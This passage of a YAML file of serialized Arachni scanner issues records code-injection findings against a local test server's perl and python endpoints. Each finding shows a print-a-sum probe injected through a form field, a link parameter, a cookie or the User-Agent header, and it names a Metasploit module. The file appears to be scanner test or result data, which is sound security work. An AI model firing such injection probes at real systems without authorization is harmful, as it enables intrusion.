          which is then executed as part of the system.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;print 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;print 287630581954+4196403186331128;
      :altered: input
      :element: form
      :params: 
        input: ;print 287630581954+4196403186331128;
      :follow_location: true
      :injected: ;print 287630581954+4196403186331128;
      :combo: 
        input: ;print 287630581954+4196403186331128;
      :action: http://localhost:11414/perl/form/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/perl/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: form
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/perl/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: default;print 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;print 287630581954+4196403186331128;
      :altered: input
      :element: form
      :params: 
        input: default;print 287630581954+4196403186331128;
      :follow_location: true
      :injected: default;print 287630581954+4196403186331128;
      :combo: 
        input: default;print 287630581954+4196403186331128;
      :action: http://localhost:11414/perl/form/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/perl/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: link
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/perl/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;print 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;print 287630581954+4196403186331128;
      :altered: input
      :element: link
      :params: 
        input: ;print 287630581954+4196403186331128;
      :follow_location: true
      :injected: ;print 287630581954+4196403186331128;
      :combo: 
        input: ;print 287630581954+4196403186331128;
      :action: http://localhost:11414/perl/link/straight?input=default
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/perl/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: link
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/perl/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: default;print 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;print 287630581954+4196403186331128;
      :altered: input
      :element: link
      :params: 
        input: default;print 287630581954+4196403186331128;
      :follow_location: true
      :injected: default;print 287630581954+4196403186331128;
      :combo: 
        input: default;print 287630581954+4196403186331128;
      :action: http://localhost:11414/perl/link/append?input=default
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/perl/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: cookie
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/perl/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=%3Bprint+287630581954%2B4196403186331128%3B;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;print 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;print 287630581954+4196403186331128;
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: ;print 287630581954+4196403186331128;
      :injected: ;print 287630581954+4196403186331128;
      :combo: 
        cookie: ;print 287630581954+4196403186331128;
      :action: http://localhost:11414/perl/cookie/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/perl/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: cookie
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/perl/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value%3Bprint+287630581954%2B4196403186331128%3B
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: cookie value;print 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;print 287630581954+4196403186331128;
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value;print 287630581954+4196403186331128;
      :injected: cookie value;print 287630581954+4196403186331128;
      :combo: 
        cookie2: cookie value;print 287630581954+4196403186331128;
      :action: http://localhost:11414/perl/cookie/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/perl/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: header
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/perl/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: ;print 287630581954+4196403186331128;
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;print 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;print 287630581954+4196403186331128;
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: ;print 287630581954+4196403186331128;
      :injected: ;print 287630581954+4196403186331128;
      :combo: 
        User-Agent: ;print 287630581954+4196403186331128;
      :action: http://localhost:11414/perl/header/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/perl/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: header
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/perl/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;print 287630581954+4196403186331128;
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: arachni_user;print 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;print 287630581954+4196403186331128;
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;print 287630581954+4196403186331128;
      :injected: arachni_user;print 287630581954+4196403186331128;
      :combo: 
        User-Agent: arachni_user;print 287630581954+4196403186331128;
      :action: http://localhost:11414/perl/header/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/perl/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: form
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/python/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;print 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;print 287630581954+4196403186331128
      :altered: input
      :element: form
      :params: 
        input: ;print 287630581954+4196403186331128
      :follow_location: true
      :injected: ;print 287630581954+4196403186331128
      :combo: 
        input: ;print 287630581954+4196403186331128
      :action: http://localhost:11414/python/form/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/python/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: form
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/python/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: default;print 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;print 287630581954+4196403186331128
      :altered: input
      :element: form
      :params: 
        input: default;print 287630581954+4196403186331128
      :follow_location: true
      :injected: default;print 287630581954+4196403186331128
      :combo: 
        input: default;print 287630581954+4196403186331128
      :action: http://localhost:11414/python/form/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/python/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: link
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/python/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
